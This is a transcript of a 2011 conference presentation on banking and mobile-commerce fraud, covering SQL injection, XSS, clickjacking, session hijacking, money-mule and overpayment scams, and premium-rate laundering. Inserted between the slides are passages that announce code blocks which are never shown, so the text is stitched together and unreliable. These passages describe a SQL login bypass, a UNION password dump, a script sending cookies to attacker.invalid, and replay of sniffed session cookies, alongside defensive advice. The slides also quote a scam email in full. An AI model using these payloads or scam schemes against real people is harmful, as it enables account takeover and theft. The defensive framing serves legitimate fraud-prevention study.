Banking Systems Security and Fraud Analysis, by Michalis Mavis, during iCompetences ISIConference - Marrakech 2011 Speaker Presentation

Transcript of the 50-slide presentation, retrieved 7/31/2019 from http://slidepdf.com/reader/full/banking-systems-security-and-fraud-analysis-by-michalis-mavis-during-icompetences

Page 1: Banking Systems Security and Fraud Analysis, by Michalis Mavis, during iCompetences ISIConference - Marrakech 2011 Speaker Presentation

Information Systems Fraud & Security Analysis

by Michalis Mavis, MSc, MSc
f. Chairman of Hellenic Fraud Forum

M-Commerce

Banking, Finance & Insurance

Page 2:

The current landscape

• The landscape today is characterized by convergence of IT, Telecom, Entertainment and Financial services.

• There is an explosive growth of smartphone capabilities, including banking transactions and payment possibilities, now performed basically by various types of cards (credit/debit, magnetic, chip cards, etc.).

• Some countries, also in Africa, have already applied mobile commerce technologies.

• Fraudsters are already present... in all banking activities.

Page 3:

Agenda

• Specific security risks in banking systems & m-commerce threats will be described.

• Business cases of relevant attacks and fraudulent activities will be given.

• Conclusions & recommendations.

Page 4:

M-Commerce & Micropayments

• According to the MPF (Mobile Payment Forum), mobile commerce is applicable to both

 – micro (<$10) and
 – macro (>$10) payments,

in both a proximity and a remote payment context.

• Most people have already experienced simple m-commerce transactions like ring tone or wallpaper downloads for their mobile phone.

• Banks face new security and fraud challenges requiring changes in the mode of operations.

Page 5:

Definitions according to

• M-Commerce

Electronic purchase of hard or soft goods, using a mobile telecom device where the mobile operator has full/partial financial stake/liability/responsibility.

• Micro-payments

A micro-payment is defined as a low cost transaction (typically ranging from a few cents up to 10 Euro), for a physical or digital item bought via or downloaded / recorded onto a mobile device and paid in a cash equivalent (i.e. a prepaid phone account, stored value account or phone bill).

• M-Wallet

A payment platform from which subscribers can pay for M-commerce transactions. Commonly set up with a top-up arrangement from the subscriber's bank or credit card.

Page 6:

M-Commerce customer benefits

Mobile infrastructure provides the platform for financial services, giving a lot of benefits to the customers.

 – There is no need to carry cash. It is cheap, fast and secure to send money over distances.

 – Security is provided in various ways (PIN, chip set, etc.).

 – There is a user friendly interface.

 – Convenience: deposit / withdraw money or pay bills without having to move or prepare a cheque.

Page 7:

The vision

• Within the next years, the majority of mobile devices (especially smartphones) will be capable of supporting mobile banking transactions without important technical modification.

• In this way, they will be able to securely authenticate the account holder (e.g. “credit card” owner) to the “bank card” issuer.

Page 8:

M-commerce General info

• Content types

 • “Soft” products - media, video clips, pre-paid accounts, etc.

 • “Hard” products at POS: supermarkets, parking, tickets, vending machines.

 • “Hard” products with shipment: e.g. books, appliances.

• Payment methods

 • Via the monthly phone bill or Prepaid account.

 • M-commerce application, i.e. M-wallet.

 • Credit or debit card.

Page 9:

Proximity payment technology

• With the new generation of smartphones and mobile networks there is an increase of mobile internet banking operations.

• The key driver for growth is the proximity NFC payment technology (based on RFID, contactless systems).

• The embedded chip and antenna enable consumers to wave their card over a reader at the point of sale.

Page 11:

Cyber Crime increase

• Cyber crime is a growing phenomenon in diversity and sophistication.

• Hackers are already present in Mobile banking operations.

• POS, ATM Systems are targeted by various criminal groups with high tech capabilities.

Page 12:

Threats and various risks to Finance Critical Infrastructures

Page 13:

Initial step

• Some well known threats used to penetrate the security of banking systems:

 – Initial step: SQL injection (one of the most common attack methods).

 – Criminals then try to steal data from databases, including log-in user-id / password and other payment card information.

• Various types of vulnerabilities are exploited.

Page 14:

SQL injection

• A successful SQL injection attack enables a malicious user to execute commands in your application's database by using the privileges granted to your application's login.

• The problem is more severe if your application uses an over-privileged account to connect to the database.
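The two slides above name SQL injection as the initial step and tie its impact to the privileges of the application's database login. The following is an added example, not taken from the presentation: a login query built by string formatting beside the parameterised form, run against a constructed in-memory SQLite table. The table, its rows and the two payloads are assumptions made for illustration only.

```python
import sqlite3

def make_db():
    """Constructed stand-in for a bank's user store (assumption, not real data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, passwd TEXT, card_no TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "s3cret", "4111-1111-1111-1111"),
        ("bob", "hunter2", "5500-0000-0000-0004"),
    ])
    return db

def login_vulnerable(db, user_id, passwd):
    """Query assembled by string formatting: attacker input becomes part of the SQL."""
    sql = ("SELECT user_id, card_no FROM users "
           "WHERE user_id = '%s' AND passwd = '%s'" % (user_id, passwd))
    return db.execute(sql).fetchall()

def login_safe(db, user_id, passwd):
    """Parameterised query: the driver binds the values, so they can only ever be data."""
    sql = "SELECT user_id, card_no FROM users WHERE user_id = ? AND passwd = ?"
    return db.execute(sql, (user_id, passwd)).fetchall()

# Constructed payloads. The first turns the WHERE clause into a tautology and logs in
# without a password; the second uses UNION to pull every password out of the table,
# which is the "steal log-in user-id / passwd" step the slide describes.
BYPASS = "x' OR '1'='1"
DUMP = "x' UNION SELECT user_id, passwd FROM users --"

def demo():
    db = make_db()
    return {
        "vulnerable_bypass": login_vulnerable(db, BYPASS, BYPASS),
        "vulnerable_dump": login_vulnerable(db, DUMP, ""),
        "safe_bypass": login_safe(db, BYPASS, BYPASS),
        "safe_dump": login_safe(db, DUMP, ""),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The parameterised version returns nothing for both payloads because the quote characters never reach the SQL parser. SQLite has no account model, so the second slide's point has to be applied on the real database: connect with a role that holds only SELECT/INSERT on the tables the application needs, so that even a successful injection cannot read the card table or drop anything.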

Page 15:

A recent case

• A bank employee, in cooperation with cyber criminals, hacked the bank corporate network in the following way:

 – A USB stick including a WiFi unit was inserted in the bank server by the bank employee (internal fraud).

 – The criminals, in a car outside the bank, hacked the bank network immediately.

Page 16:

Other types of attacks

• Common types of attacks include:

 – Cross-site scripting.

 – Click-jacking.

 – Skimming.

 – Phishing attacks.

 – Other IT infrastructure attacks.

Page 17:

Cross-site scripting (XSS)

• XSS is a type of computer security vulnerability typically found in web applications, that enables attackers to inject client-side script into Web pages viewed by other users.

• By finding ways of injecting malicious scripts into web pages, an attacker can gain access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user.

• Cross-site scripting carried out on websites accounted for roughly 80% of all security vulnerabilities documented by Symantec, as of 2007. (Wiki)
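The slide explains XSS in terms of outcome (script reaches other users' browsers and reads their cookies). As an added example that is not part of the presentation, here is the mechanism at the rendering step: a page that concatenates user text into HTML beside one that escapes it, fed a constructed cookie-stealing payload. The host name attacker.invalid is a reserved non-resolving name used as an assumption.

```python
import html

# Constructed payload: ships document.cookie to an attacker host by loading an image.
COOKIE_STEALER = ("<script>new Image().src="
                  "'http://attacker.invalid/c?'+document.cookie</script>")

def render_profile_unsafe(display_name):
    """Puts user-controlled text straight into HTML: stored or reflected XSS."""
    return "<h1>Welcome, " + display_name + "</h1>"

def render_profile_safe(display_name):
    """Escapes <, >, &, ' and \" so the browser renders the text instead of executing it."""
    return "<h1>Welcome, " + html.escape(display_name, quote=True) + "</h1>"

def render_link_safe(url, text):
    """Attribute context needs escaping plus a scheme check: a javascript: URL
    survives html.escape untouched and still runs when clicked."""
    if not url.lower().startswith(("http://", "https://")):
        url = "#"
    return '<a href="%s">%s</a>' % (html.escape(url, quote=True), html.escape(text))

def contains_script(markup):
    """Crude check used only to show what each renderer emits."""
    return "<script" in markup.lower()

if __name__ == "__main__":
    print(render_profile_unsafe(COOKIE_STEALER))
    print(render_profile_safe(COOKIE_STEALER))
```

Escaping has to match the context (HTML body, attribute, URL, script block), which is why the link helper does more than call html.escape. Independently of escaping, marking the session cookie HttpOnly keeps document.cookie empty for any script that does get injected, which removes the payoff the slide describes.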

Page 18:

Click-jacking

• A clickjacked page tricks a user into performing undesired actions by clicking on a concealed link.

• On a clickjacked page, the attackers show a set of dummy buttons, then load another page over it in a transparent layer. The users think that they are clicking the visible buttons, while they are actually performing actions on the hidden page. (Wiki)
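The defence against the transparent-layer trick described above is for the bank's page to refuse to be framed at all. As an added example (not from the presentation), the following shows the attacker's overlay markup and a check a tester can run over a response's headers to decide whether a page is frameable; bank.example, the URL in the iframe and the header sets are assumptions.

```python
# Constructed attacker page (assumption): the bank's page is loaded in an invisible
# iframe on top of a decoy button, so a click on the decoy lands on the hidden page.
ATTACKER_PAGE = """\
<button style="position:absolute;top:100px;left:100px">Claim prize</button>
<iframe src="https://bank.example/transfer?to=mule&amount=9000"
        style="position:absolute;top:0;left:0;width:100%;height:100%;opacity:0">
</iframe>
"""

SAFE_ANCESTORS = {"'none'", "'self'"}

def framing_allowed(headers, own_origin="https://bank.example"):
    """True if a response carrying these headers can be framed by a third-party site.
    Browsers honour CSP frame-ancestors over X-Frame-Options when both are present,
    so that directive is checked first and X-Frame-Options is the fallback."""
    h = {k.lower(): v for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = set(parts[1:])
            # An empty source list means 'none'; otherwise every source must be ours.
            return bool(sources) and not sources <= (SAFE_ANCESTORS | {own_origin})
    xfo = h.get("x-frame-options", "").strip().upper()
    return xfo not in ("DENY", "SAMEORIGIN")

def hardened_headers():
    """Headers a banking page should send; both set so old and new browsers are covered."""
    return {
        "Content-Security-Policy": "frame-ancestors 'none'",
        "X-Frame-Options": "DENY",
    }
```

A page that allows a partner origin in frame-ancestors is still frameable by that partner, so the check reports it as allowed; whether that is acceptable is a business decision, but for a transfer page the answer is normally 'none'.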

Page 19:

Skimming

• Skimming includes theft of credit card information used in an otherwise legitimate transaction.

• It is often, but not always, an "inside job" by a dishonest employee.

• The purpose may be to obtain goods without paying, or to obtain unauthorized funds from an account.

Page 22:

To which account to transfer the money?

• They are not so crazy as to transfer the money to an account that was opened under their own name (with their ID-card or passport).

• They are using other, more advanced techniques so that they may get the money without being traced.

• How is it possible?

Page 23:

How to transfer money without traces?

• The fraudsters build a web site pretending they are a big company looking for new employees.

• They provide forms to be filled in by candidates.

• Then a candidate (victim-2) is “employed” by the “company” and he is getting his first advance salary (this is money taken from victim-1).

• He is asked to keep a part of the money and send the rest to another location.

Page 24:

The money path is lost!

• Victim-2 is asked to use Western Union or MoneyGram money transfer systems (outside the normal banking sector), so that anybody with a false ID-card or passport may get the money.

• The money path is lost and there is no way to find out who actually got the money!

• The money went somewhere in Africa...

Page 25:

Victim against Victim

• Victim-1 finds out his money is gone from his bank account.

• He asks assistance from the police.

• Following a short investigation, victim-2 is arrested.

• There is no possibility for victim-2 to prove that he is not guilty. He sent the money to Africa to somebody that DOES NOT EXIST…

Page 26:

The “clever” scenario… diagram

Victim-1: Provided by mistake his Bank Account credentials.

Victim-2: Got the money from Victim-1's Bank Account for a service that he thought was legitimate.

Fraudster: Got the money from victim-2 and disappeared.

Victim-1 sends the police to arrest victim-2, thinking he is the fraudster…

Page 27:

Another scenario against Victim-2

• The previous scenario became known, so the fraudsters started using a more clever one, connected with the second hand car selling business.

• The car owners are selling their cars by using a suitable web application.

• The fraudster visits on-line car selling web pages and buys a car on behalf of “his customer”.

Page 28:

Buying and selling used cars online

• He sends more money than what the car owner requests, pretending that the rest of the money should be sent to a person that will undertake the car refreshing and shipping.

• So, they ask the receiving person to send the excess money to a person via Western Union.

• Look at an Email message received by the car owner!

Page 29:

A very “honest”… Email

• “I am delighted to tell you that my client appreciates and commends your vehicle, with full interest. I have finalized with my client on the price of 16,000 euro which is the last asking price for your vehicle and its ok by him.

• He also instructed me to inform you that payment will get to you in a bank money transfer, at the amount of 25,000 euro.

• So you are required to deduct the cost of your vehicle which is 16,000 euro, when payment gets to you and refund balance 9,000 euro to the Agent (our shipper) for him to be able to offset shipping & tax charges, and other cosmetic repair costs.”

Page 30:

Money Laundering

• In this way victim-2 is used as a money laundering tool for victim-1's money.

• Victim-2 gets 25,000 € and sends 9,000 € to the fraudster.

• The fraudster's real name remains unknown, even though the Western Union branch (where the money was transferred) is known.

Page 31:

The poor Victim-2

• The car owner (victim-2) goes to prison as responsible for the fraud, even though he did not perform any illegal action (according to his understanding).

• The money he got (16,000 €) is taken back by the police and, on top of that, he lost 9,000 € and his car is unsold…
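Both scenarios above (the fake job and the car overpayment) have the same shape from the receiving bank's side: a credit from a sender the account has never dealt with, followed within days by a cash remittance of a large slice of it. As an added example that is not part of the presentation, here is a detection rule run over a constructed ledger for victim-2's account. The 25,000 and 9,000 amounts follow the slides; the dates, counterparty labels, the comparison account and the thresholds are assumptions a bank would tune on its own data.

```python
from datetime import datetime, timedelta

REMITTANCE_CHANNELS = {"cash_remittance"}   # Western Union / MoneyGram style payouts

# Constructed ledger for victim-2's account (assumption): the credit and the payout
# follow the slide, the third row is ordinary activity.
LEDGER_VICTIM2 = [
    {"ts": "2011-03-01", "dir": "in",  "amount": 25000.0, "counterparty": "unknown-sender-1", "channel": "bank_transfer"},
    {"ts": "2011-03-02", "dir": "out", "amount":  9000.0, "counterparty": "Western Union",    "channel": "cash_remittance"},
    {"ts": "2011-03-05", "dir": "out", "amount":   120.0, "counterparty": "electricity-co",   "channel": "bank_transfer"},
]

# Constructed ordinary account: a known employer pays a salary, a small remittance follows.
LEDGER_NORMAL = [
    {"ts": "2011-02-01", "dir": "in",  "amount": 2000.0, "counterparty": "employer-ltd",  "channel": "bank_transfer"},
    {"ts": "2011-03-01", "dir": "in",  "amount": 2000.0, "counterparty": "employer-ltd",  "channel": "bank_transfer"},
    {"ts": "2011-03-03", "dir": "out", "amount":  100.0, "counterparty": "Western Union", "channel": "cash_remittance"},
]

def mule_alerts(ledger, window_days=7, min_ratio=0.2, min_credit=1000.0):
    """Return (credit, payout) pairs where a credit of at least min_credit from a
    never-seen sender is followed within window_days by a cash remittance worth at
    least min_ratio of it. Thresholds are assumptions, not tuned values."""
    rows = sorted(ledger, key=lambda r: r["ts"])
    seen_senders, alerts = set(), []
    for i, credit in enumerate(rows):
        if credit["dir"] != "in":
            continue
        new_sender = credit["counterparty"] not in seen_senders
        seen_senders.add(credit["counterparty"])
        if not new_sender or credit["amount"] < min_credit:
            continue
        t0 = datetime.strptime(credit["ts"], "%Y-%m-%d")
        for payout in rows[i + 1:]:
            if payout["dir"] != "out" or payout["channel"] not in REMITTANCE_CHANNELS:
                continue
            t1 = datetime.strptime(payout["ts"], "%Y-%m-%d")
            if t1 - t0 <= timedelta(days=window_days) and payout["amount"] >= min_ratio * credit["amount"]:
                alerts.append((credit, payout))
    return alerts

if __name__ == "__main__":
    for credit, payout in mule_alerts(LEDGER_VICTIM2):
        print("mule pattern:", credit["amount"], "in on", credit["ts"], "->",
              payout["amount"], "out via", payout["counterparty"], "on", payout["ts"])
```

On a hit the useful action is to hold the outgoing remittance and call back the sending bank to confirm the credit was authorised: in the slides' story the credit was pushed with victim-1's stolen credentials, so a hold protects both victims, whereas the money is unrecoverable once it has been collected at the remittance counter.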

Page 32:

ID-theft for various crimes

Page 33:

Identity Theft

Is not only stealing our ID card but any other personal documents or data, including:

 – Our Name

 – Date of birth

 – Nationality

 – Fiscal Number (tax number)

 – Credit card numbers and card secret numbers

 – e-mail data

 – Signature

 – Photograph

 – Driving Licence and other documents / data that may be used to commit criminal activities.

Page 34:

Id-theft by using Social Networks

• A lot of personal information may be found unprotected in Social Networking sites.

• Proof of address by stealing a Power Bill from the user's house.

• Faked documents are not so difficult to produce.

Page 35:

Hacking SNs users accounts

By using simple programs like Firesheep a hacker may steal personal information contained in:

 – Social Networking Sites (like FaceBook, Twitter etc.)

 – Email accounts (Google, Yahoo, etc.) and so on...

Firesheep hijacks other people's sessions. In order to break into someone's account just open up Firesheep, click ‘Start Capturing’ and it will list all the users in your network that are currently logged on.
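What Firesheep automated was HTTP session hijacking: on a shared network it read session cookies out of requests sent over plain HTTP and replayed them. The caveat a practitioner wants is that it only ever worked against sessions that crossed the wire unencrypted; a site that forces HTTPS and marks its cookie Secure is not affected. As an added example (not from the presentation), the block below lifts session cookies from a constructed plaintext capture, builds the replay request, and audits a Set-Cookie header for the attributes that prevent this. Hosts, cookie names and values are made up.

```python
# Constructed plaintext capture (assumption): two HTTP requests exactly as a sniffer on
# the same open Wi-Fi sees them when the sites do not use HTTPS.
CAPTURE = """\
GET /home HTTP/1.1
Host: social.example
Cookie: sessionid=9f2c1e7a4b; lang=en

GET /inbox HTTP/1.1
Host: mail.example
Cookie: SID=AbCdEf123456
"""

SESSION_COOKIE_NAMES = {"sessionid", "sid", "session", "phpsessid", "jsessionid"}

def sniff_sessions(capture, names=SESSION_COOKIE_NAMES):
    """Pull (host, cookie name, value) for every session cookie sent unencrypted."""
    found, host = [], None
    for line in capture.splitlines():
        if line.lower().startswith("host:"):
            host = line.split(":", 1)[1].strip()
        elif line.lower().startswith("cookie:"):
            for pair in line.split(":", 1)[1].split(";"):
                name, _, value = pair.strip().partition("=")
                if name.lower() in names:
                    found.append((host, name, value))
    return found

def forged_request(host, name, value, path="/"):
    """The hijack itself: replay the victim's cookie and the server treats us as them."""
    return "GET %s HTTP/1.1\r\nHost: %s\r\nCookie: %s=%s\r\n\r\n" % (path, host, name, value)

def cookie_weaknesses(set_cookie):
    """Attributes missing from a Set-Cookie header that make the above possible."""
    attrs = {a.strip().split("=")[0].lower() for a in set_cookie.split(";")[1:]}
    missing = []
    if "secure" not in attrs:
        missing.append("Secure")     # browser would send it over plain HTTP too
    if "httponly" not in attrs:
        missing.append("HttpOnly")   # script injected via XSS could read it
    return missing

def hardened_set_cookie(name, value):
    """How the session cookie should be issued (SameSite=Lax is an assumption)."""
    return "%s=%s; Secure; HttpOnly; SameSite=Lax; Path=/" % (name, value)

if __name__ == "__main__":
    for host, name, value in sniff_sessions(CAPTURE):
        print("hijackable session on", host, "->", forged_request(host, name, value).split("\r\n")[2])
```

The Secure flag is the one that defeats sniffing; HttpOnly is listed because the same cookie is the target of the XSS attack on the earlier slide, and a cookie that is only ever issued with both flags is exposed by neither.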

Page 36:

Stealing Credit Cards…

[Diagram] USA, JFK airport (credit card public payphones) -> PSTN -> Portugal (fraudsters). Heavy traffic of unanswered calls. The ring tone was deactivated on the US card phones (RINGTONE OFF).

Page 37:

Risks & roles in m-commerce

 – Mobile Subscriber as fraudster.

 – Mobile Subscriber as victim.

 – Content Provider as fraudster.

Page 38:

Value added services with mobile phones

• Mobile phones may be used to:

 – buy a Coca-Cola from a vending machine (just make a call to the number on the machine).

 – Buy theater tickets.

 – Play in the Internet Casino, and many more applications.

• In many of those cases fraudsters have been very active already (the casino case).

Page 39:

ON LINE CASINO

How it works.

• Connect to the Casino web site.

• Then you are asked to send an SMS message using your mobile phone, to a specific number, to get credit (marks). For example you get 100 € credit (charged to your mobile phone).

• You play games (you lose – you win).

• At the end you may exchange the remaining marks (credit), if any, with money that will be sent to your bank account by the casino.

• Fraudsters arrested in a European country.

Page 40:

IDENTITY THEFT AND SUBSCRIPTION FRAUD IN MOBILE PHONES…

Page 41:

Subscriber as fraudster, cases

• Repeated downloads by the subscriber, but only billed once. The fraudster applies technical ways of repeating a download already completed without additional billing.

• The fraudster makes money by illegally reselling the digital product he bought.

• Billing records may be manipulated (internal fraud). No bill for m-commerce.

• Avoid being billed for content by falsifying a successful download as unsuccessful.

Page 42:

More subscriber m-commerce frauds

• Cloned SIM cards used for m-commerce, billing the legitimate subscriber.

• IP spoofing: IP packets from one device are made to appear as if coming from another, trusted device.

• Attackers can use sniffers to record traffic and steal credit card details.

Page 43:

Content Provider fraud (examples)

 – Goods purchased from the Content Provider and the subscriber billed for the content (as expected). Then the subscriber is billed illegally for repetitions of the first transaction.

 – A rogue Content Provider may find ways of delivering content without subscriber authorisation or request, thereby inflating revenue.

 – The Content Provider falsifies a download failure to justify additional uploads, whilst billing the subscriber for every upload.
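The subscriber cases on Page 41 and the content provider cases above are mirror images of one discrepancy: what the delivery gateway recorded does not match what was billed. As an added example serving both slides (not from the presentation), here is a reconciliation of two constructed logs that surfaces each pattern. Transaction ids, subscriber labels and the status vocabulary are assumptions.

```python
from collections import Counter

# Constructed logs (assumption): what the delivery gateway recorded versus what the
# content provider submitted for billing.
DELIVERIES = [  # (txn_id, subscriber, status reported by the gateway)
    ("t1", "sub-A", "ok"),
    ("t2", "sub-B", "ok"),
    ("t3", "sub-C", "failed"),
    ("t4", "sub-D", "ok"),
]
BILLINGS = [  # (txn_id, subscriber) as submitted by the content provider
    ("t1", "sub-A"), ("t1", "sub-A"), ("t1", "sub-A"),   # one purchase billed three times
    ("t2", "sub-B"),
    ("t3", "sub-C"),                                      # billed although delivery failed
    ("t5", "sub-E"),                                      # billed with no delivery at all
]

def reconcile(deliveries, billings):
    """Match billing records against delivery records, transaction by transaction."""
    status = {txn: s for txn, _, s in deliveries}
    bills = Counter(txn for txn, _ in billings)
    return {
        # Content Provider fraud: repetitions of the first transaction
        "double_billed": sorted(t for t, n in bills.items() if n > 1),
        # Content Provider fraud: revenue for content never successfully delivered
        "billed_not_delivered": sorted(t for t in bills if status.get(t) != "ok"),
        # Subscriber fraud: download completed but reported as failed, never billed
        "delivered_not_billed": sorted(t for t, s in status.items() if s == "ok" and bills[t] == 0),
    }

if __name__ == "__main__":
    for finding, txns in reconcile(DELIVERIES, BILLINGS).items():
        print(finding, txns)
```

The rule only works if the gateway's delivery status is written by the operator and not supplied by the content provider or the handset; a status either party can forge reproduces exactly the frauds the slides list.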

Page 44:

M-commerce PRS fraud modus operandi(Content Provider fraud)

• The content provider gets a lot of phones/SIM cards by subscription fraud.

• He uses the fraudulent lines to make a lot of calls to his own services until their disconnection.

• The content provider is paid, even though the operator was not paid by the customer.

• The main concern of m-commerce PRS fraud is the speed at which the fraud loss can accumulate.

• An automatic device (a PC connected to a SIM card) is technically able to send at least one SMS per second.

• If micropayments are based on SMS, a fraudulent GSM line can generate a tremendous loss at the end of one day.
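Because the loss is a function of rate, the operator-side control is a per-line velocity check on the SMS micropayment feed, applied before settlement to the content provider. The block below is an added example, not code from the presentation: the event layout (timestamp, MSISDN, premium short code, amount), the window and threshold values, and the sample traffic are all constructed assumptions. `projected_daily_loss` simply carries the slide's own one-SMS-per-second figure through to a daily amount.

```python
"""Velocity check on SMS-based micropayments per GSM line.  Added example, not
from the presentation; the record layout, thresholds and sample traffic are
constructed assumptions."""
from collections import defaultdict

SECONDS_PER_DAY = 86400


def build_sample_events():
    """Constructed traffic: (timestamp_s, msisdn, premium_shortcode, amount_eur).
    MSISDNs and the short code are placeholders."""
    events = []
    # Ordinary subscriber: three purchases spread over an hour.
    for t in (0, 1500, 3300):
        events.append((t, "306900000001", "54321", 1.0))
    # Automated line (PC + SIM): one SMS per second for two minutes, all to one service.
    for t in range(120):
        events.append((t, "306900000002", "54321", 1.0))
    return sorted(events)


def peak_window_count(timestamps, window_s=60):
    """Largest number of events falling inside any window of window_s seconds."""
    ts = sorted(timestamps)
    best, start = 0, 0
    for end in range(len(ts)):
        while ts[end] - ts[start] >= window_s:
            start += 1
        best = max(best, end - start + 1)
    return best


def flag_high_velocity(events, window_s=60, max_per_window=10):
    """Lines whose peak SMS rate exceeds max_per_window, with the money already at risk."""
    per_line = defaultdict(list)
    exposure = defaultdict(float)
    for t, msisdn, _shortcode, amount in events:
        per_line[msisdn].append(t)
        exposure[msisdn] += amount
    flagged = {}
    for msisdn, ts in per_line.items():
        peak = peak_window_count(ts, window_s)
        if peak > max_per_window:
            flagged[msisdn] = {"peak_per_window": peak, "exposure_eur": exposure[msisdn]}
    return flagged


def projected_daily_loss(sms_per_second, amount_per_sms):
    """Loss one line can run up in a day if nobody stops it, using the slide's
    figure of at least one SMS per second."""
    return sms_per_second * SECONDS_PER_DAY * amount_per_sms


if __name__ == "__main__":
    events = build_sample_events()
    print(flag_high_velocity(events))
    print("one line, one SMS/s, 1 EUR each:", projected_daily_loss(1, 1.0), "EUR/day")
```

A threshold of ten purchases per minute is only a placeholder; in practice it is set per service from observed legitimate behaviour, and the flag feeds a hold on the line's further premium traffic and on settlement of the affected revenue, rather than an after-the-fact report.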

Page 45: Banking Systems Security and Fraud Analysis, by Michalis Mavis, during iCompetences ISIConference - Marrakech 2011 Speaker Presentation

PRS Fraud players

[Diagram: Fraudster → Telecom Operator → Content Provider. The Fraudster never pays the Telecom Operator; the Telecom Operator pays the Content Provider; the money is lost by the Telecom Operator.]

Page 46: Banking Systems Security and Fraud Analysis, by Michalis Mavis, during iCompetences ISIConference - Marrakech 2011 Speaker Presentation

Telecom Fraud & Money Laundering

• PRS (Premium Rate telecom Services) are used for money laundering.

• How is it done?

[Figure: tax paradise islands]

Page 47: Banking Systems Security and Fraud Analysis, by Michalis Mavis, during iCompetences ISIConference - Marrakech 2011 Speaker Presentation

How money laundering is performed …

• The PRS content provider has a lot of money due to illegal activities (drugs, guns etc.) and wants to legalize it.

• He builds a PRS service and starts making calls, at his own expense, to his own services.

• The money earned by the PRS content provider is now legal and clear!
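Whether the provider's own calls are paid for (laundering, as on this slide) or never paid for (the subscription-fraud case on the earlier modus operandi slide), the revenue of the premium service ends up concentrated on a handful of originating lines instead of spread over genuine customers. The check below is an added example, not code from the presentation; the record layout, the ownership data linking lines to the provider, the thresholds and the sample values are constructed assumptions.

```python
"""Originator-concentration check on premium-rate (PRS) revenue, the pattern
behind a provider calling his own services.  Added example, not from the
presentation; the record layout, ownership data, thresholds and sample values
are constructed assumptions."""
from collections import defaultdict

# Constructed records of chargeable calls/SMS to premium services:
# (originating_msisdn, shortcode, revenue_eur).  Numbers are placeholders.
RECORDS = []
# Service 90001: genuine demand, 2 EUR from each of 40 different lines.
RECORDS += [("3069100000%02d" % i, "90001", 2.0) for i in range(40)]
# Service 90002: nearly all revenue from three lines, plus three one-off callers.
RECORDS += [("306920000001", "90002", 2.0)] * 30
RECORDS += [("306920000002", "90002", 2.0)] * 25
RECORDS += [("306920000003", "90002", 2.0)] * 25
RECORDS += [("3069300000%02d" % i, "90002", 2.0) for i in range(3)]

# Lines known (from subscription/KYC data, constructed here) to belong to the
# party that operates each premium service.
PROVIDER_LINES = {"90002": {"306920000001", "306920000002", "306920000003"}}


def revenue_by_originator(records):
    """shortcode -> {originating msisdn -> revenue}"""
    rev = defaultdict(lambda: defaultdict(float))
    for msisdn, shortcode, amount in records:
        rev[shortcode][msisdn] += amount
    return rev


def flag_self_dealing(records, provider_lines, top_k=3, max_top_share=0.5):
    """Flag services where the top_k originating lines carry more than
    max_top_share of the revenue, or where any revenue comes from lines
    registered to the provider itself."""
    flagged = {}
    for shortcode, by_line in revenue_by_originator(records).items():
        total = sum(by_line.values())
        top = sorted(by_line.values(), reverse=True)[:top_k]
        top_share = sum(top) / total
        own = provider_lines.get(shortcode, set())
        self_share = sum(v for m, v in by_line.items() if m in own) / total
        reasons = []
        if top_share > max_top_share:
            reasons.append("revenue_concentrated")
        if self_share > 0:
            reasons.append("provider_own_lines")
        if reasons:
            flagged[shortcode] = {
                "total_eur": total,
                "top_share": round(top_share, 4),
                "self_share": round(self_share, 4),
                "reasons": reasons,
            }
    return flagged


if __name__ == "__main__":
    for shortcode, info in flag_self_dealing(RECORDS, PROVIDER_LINES).items():
        print(shortcode, info)
```

The concentration test works without any ownership data and is what catches the case where the provider hides behind lines obtained by subscription fraud; the ownership test is the stronger signal when the operator's subscriber records can tie the calling lines to the same legal or natural person as the service. Either flag is a reason to hold the provider's payout pending review, not proof on its own.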

Page 48: Banking Systems Security and Fraud Analysis, by Michalis Mavis, during iCompetences ISIConference - Marrakech 2011 Speaker Presentation

Risks in M-commerce

• Known types of Frauds (Subscriber as fraudster)

– Subscription fraud / Roaming fraud

– Subscriber Content Theft (IPRs)

– Download without correct billing

– Content Duplication for distribution

• Technical Frauds (Subscriber as victim)

– Session stealing

– Identity Spoofing (IP Spoofing)

– Man-in-the-middle

– Electronic eavesdropping

– Billing inflation attack

– Receipt of goods not requested

– Content with Trojan

Page 49: Banking Systems Security and Fraud Analysis, by Michalis Mavis, during iCompetences ISIConference - Marrakech 2011 Speaker Presentation

Conclusions

• Banking activities, and especially Mobile Commerce & Micropayments, are services continuously targeted by cyber criminals.

• There are a lot of security threats and risks associated with those services.

• Fraudsters are already present and active in the area.

• The basic players should take all necessary measures for protecting security and mitigating risks.

• Banking security experts should have a good IT security background, but also a telecom and mobile fraud background.

Page 50: Banking Systems Security and Fraud Analysis, by Michalis Mavis, during iCompetences ISIConference - Marrakech 2011 Speaker Presentation

Thank you

Michalis Mavis, MSc, MSc

//gr.linkedin.com/in/mmavis